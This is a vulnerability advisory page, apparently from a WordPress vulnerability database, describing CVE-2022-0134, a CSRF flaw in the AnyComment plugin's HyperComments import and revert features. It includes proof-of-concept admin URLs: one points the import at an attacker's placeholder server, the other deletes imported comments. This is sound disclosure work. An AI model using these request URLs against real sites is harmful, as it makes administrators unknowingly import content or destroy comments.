Lucene search
Brandon RoldanWPEX-ID:FA09EA9B-D5A0-4773-A692-9FF0200BCD85HistoryJan 19, 2022 - 12:00 a.m.
AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF
2022-01-1900:00:00
Brandon Roldan
103
0.001 Low
EPSS
Percentile
43.6%
The plugin does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make logged in admin perform such actions via a CSRF attack
Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done.
To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1
https://www.youtube.com/watch?v=75BH2m8cmPoRelated
wpvulndb
wpvulndb
AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF
2022-01-19 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-02-21 11:15:00
nvd
nvd
CVE-2022-0134
2022-02-21 11:15:09
cvelist
cvelist
patchstack
patchstack
cve
cve
CVE-2022-0134
2022-02-21 11:15:09
qualysblog
qualysblog
Identify Server-Side Attacks Using Qualys Periscope
2022-12-01 23:11:35